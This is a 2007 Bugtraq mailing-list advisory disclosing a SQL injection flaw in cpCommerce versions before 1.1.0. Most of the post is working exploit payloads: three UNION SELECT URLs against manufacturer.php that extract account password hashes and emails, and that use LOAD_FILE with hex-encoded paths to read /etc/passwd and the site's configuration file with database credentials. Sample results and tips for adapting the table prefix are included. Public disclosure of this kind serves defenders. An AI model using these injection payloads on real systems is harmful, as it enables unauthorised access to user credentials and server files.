[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070529200207.28650.qmail@securityfocus.com>
Date: 29 May 2007 20:02:07 -0000
From: laurent.gaffie@...il.com
To: bugtraq@...urityfocus.com
Subject: cpcommerce < v1.1.0 [sql injection]
vendor site:http://cpcommerce.cpradio.org/
product:cpcommerce < v1.1.0
bug: sql injection
risk : high
note:works regardless of php.ini settings .
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/*
//result:
Information about '8725ade7b722d1ad43b7b949162eab4d'
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh
...........
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,email,0/**/from/**/cpAccounts/*
//result:
Information about '8725ade7b722d1ad43b7b949162eab4d'
none@...e.com
read database credentials plain text:
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870),pass,0/**/from/**/cpAccounts/*
//result:Products in '..............
// Database Information
$config['host'] = "localhost"; // Database Host $config['user'] = "my_user"; // Database Username $config['pass'] = "my_password"; // Database Password $config['database'] = "hi"; // Database Name $config['prefix'] = "cp";
...........................
'8725ade7b722d1ad43b7b949162eab4d'
ps1: 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870
--> /usr/local/apache2/htdocs/cpcommerce/_config.php
ps2: /**/cpAccounts/* --> cp = prefix.
Accounts --> table_name .
(cp is the default one) so you can try with your table prefix .
regards laurent gaffie
Powered by blists - more mailing lists